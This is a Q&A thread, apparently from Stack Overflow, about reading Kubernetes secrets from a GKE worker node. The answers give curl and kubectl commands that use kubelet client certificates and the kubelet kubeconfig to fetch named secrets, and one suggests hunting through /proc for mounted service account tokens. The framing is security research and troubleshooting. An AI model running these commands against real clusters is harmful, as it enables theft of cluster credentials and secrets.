Mugen
Mugen

Reputation: 9095

system:node fails to get secrets from apiserver via curl

I'm doing some POC for security research, trying to access namespace secrets directly from a worker node. I have a cluster on GKE running Kubernetes 1.20

I'm running the following command from a worker (none-master) node:

curl -v $APISERVER/api/v1/namespaces/default/pods/ \
  --cacert /etc/srv/kubernetes/pki/ca-certificates.crt \
  --cert /var/lib/kubelet/pki/kubelet-client.crt \
  --key /var/lib/kubelet/pki/kubelet-client.key

And it works fine.

However, trying to get secrets fails:

curl -v $APISERVER/api/v1/namespaces/default/secrets/ \
  --cacert /etc/srv/kubernetes/pki/ca-certificates.crt \
  --cert /var/lib/kubelet/pki/kubelet-client.crt \
  --key /var/lib/kubelet/pki/kubelet-client.key
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {
},
"status": "Failure",
"message": "secrets is forbidden: User \"system:node:gke-XXX--YYY\" cannot list resource \"secrets\" in API group \"\" in the namespace \"pencil\": No Object name found",
"reason": "Forbidden",
"details": {
  "kind": "secrets"
},
"code": 403

Looking at the documentation, I see that kubelet running on node should be able to access secrets: https://kubernetes.io/docs/reference/access-authn-authz/node/

And from my understanding, the authorization is backed by the ClusterRole system:node. Looking at it I do see it has the role to get secrets:

% kubectl get clusterrole system:node -o json
{
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "ClusterRole",
...
        {
            "apiGroups": [
                ""
            ],
            "resources": [
                "configmaps",
                "secrets"
            ],
            "verbs": [
                "get",
                "list",
                "watch"
            ]
        },
...
    ]
}

And some more relevant documentation for communication between kubelet and kube-apiserver: https://kubernetes.io/docs/concepts/architecture/control-plane-node-communication/#node-to-control-plane

Upvotes: 0

Views: 1108

Answers (3)

Mugen
Mugen

Reputation: 9095

After digging in the source code, I found the meaning of No Object name found error - secrets or configmaps must be named in order to be retrieved. As suggested by the documentation, they can be retrieved if mapped to the node in question by some pod.

Therefore assuming some secret server-password is used by some pod in my node, following command worked as expected:

curl -v $APISERVER/api/v1/namespaces/default/secrets/server-password \
  --cacert /etc/srv/kubernetes/pki/ca-certificates.crt \
  --cert /var/lib/kubelet/pki/kubelet-client.crt \
  --key /var/lib/kubelet/pki/kubelet-client.key

Also apparently kubectl can be used just as simply, its the one creating the certificates at /var/lib/kubelet/pki in the first place.

kubectl --kubeconfig /var/lib/kubelet/kubeconfig -n default get secret server-password -o json

Upvotes: 1

Rajesh Dutta
Rajesh Dutta

Reputation: 249

This is expected.

Because the access to secrets is permitted(normally) via service account. You need to find the service account token mounted on a pod running on the node. For this you may try to dig into "magical" /proc folder on the node. If you can access the service account token mounted on the pod and that service account has the permission to access secrets then only the secrets can be accessed from the nodes.

Upvotes: 0

confused genius
confused genius

Reputation: 3284

  • I think the certificates location you are giving is incorrect. I have tried the same on my plain kubernetes cluster with following certificates and it worked fine.
curl --cacert /etc/kubernetes/pki/ca.crt --cert /etc/kubernetes/pki/apiserver-kubelet-client.crt --key /etc/kubernetes/pki/apiserver-kubelet-client.key $APISERVER/api/v1/namespaces/default/secrets

Upvotes: 3

Related Questions